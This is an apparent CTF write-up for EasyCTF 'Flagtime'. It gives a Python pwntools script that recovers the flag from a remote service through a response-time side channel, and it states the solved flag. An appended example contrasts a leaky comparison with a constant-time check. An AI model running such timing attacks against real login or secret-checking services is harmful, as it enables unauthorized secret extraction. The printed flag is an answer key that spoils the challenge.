EASYCTF - Flagtime

This problem is so easy, it can be solved in a matter of seconds. Connect to c1.easyctf.com:12482.

This was a simple timing attack on the service c1.easyctf.com:12482. However, extracting the 26 characters took a really long time… The first delay was 1 second and was then incremented by 1 for every correct character; when you're trying to get the last characters, it took around 25 seconds a try :(

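#!/usr/bin/python
# -*- coding: utf-8 -*-
from pwn import *
import time

# Known prefix so far, and the response-time threshold (in seconds) above
# which the next candidate character is treated as correct.
flag      = "easyctf{ez_t1m1ng_4ttack!}"
max_time  = 27

while True:
    # Candidate characters, tried in this order.
    for c in "!?}_15scktemng4afbsydh5ij37lopqruvwx02689z-@{":
        p = remote("c1.easyctf.com", 12482)
        p.recv()

        # Time a single guess: known prefix plus one candidate character.
        before = time.time()
        p.sendline((flag + c).encode())
        p.recv()
        p.close()

        after = time.time()
        # A response slower than the threshold means one more character
        # matched: keep it and raise the threshold by one second.
        if after - before > max_time:
            max_time = max_time + 1
            print(max_time)
            flag = flag + c
            break

    print(flag)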
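
The flaw the script relies on, next to a hardened check, as an added example that is not part of the original write-up or the challenge's code. `leaky_check` is an assumed model of the service built only from the delays described above (1 second, plus 1 per correct leading character); `SECRET`, `hardened_check` and `delay_profile` are hypothetical names, and the secret is a constructed sample.

```python
import hmac
import time

SECRET = b"flag{constructed}"  # constructed sample secret, not the challenge flag


def leaky_check(guess, secret=SECRET, sleep=time.sleep):
    """Assumed model of the service: 1 s base delay plus 1 s per correct
    leading character, so the response time reveals the matched prefix length."""
    matched = 0
    for g, s in zip(guess, secret):
        if g != s:
            break
        matched += 1
    sleep(1 + matched)
    return guess == secret


def hardened_check(guess, secret=SECRET, sleep=time.sleep):
    """Constant-time comparison plus a delay that does not depend on the guess."""
    ok = hmac.compare_digest(guess, secret)
    sleep(1)  # fixed throttle: every attempt costs the same
    return ok


def delay_profile(check, guesses):
    """Return the delay each guess would incur, recording the requested
    sleeps instead of actually waiting."""
    recorded = []
    for guess in guesses:
        check(guess, sleep=recorded.append)
    return recorded


if __name__ == "__main__":
    guesses = [b"x", b"f", b"fl", b"flag{", SECRET]
    print("leaky   :", delay_profile(leaky_check, guesses))
    print("hardened:", delay_profile(hardened_check, guesses))
```

With the leaky check the delay grows with every correct leading character, which is the signal the script thresholds on; with the hardened check every guess costs the same, so timing says nothing about the prefix.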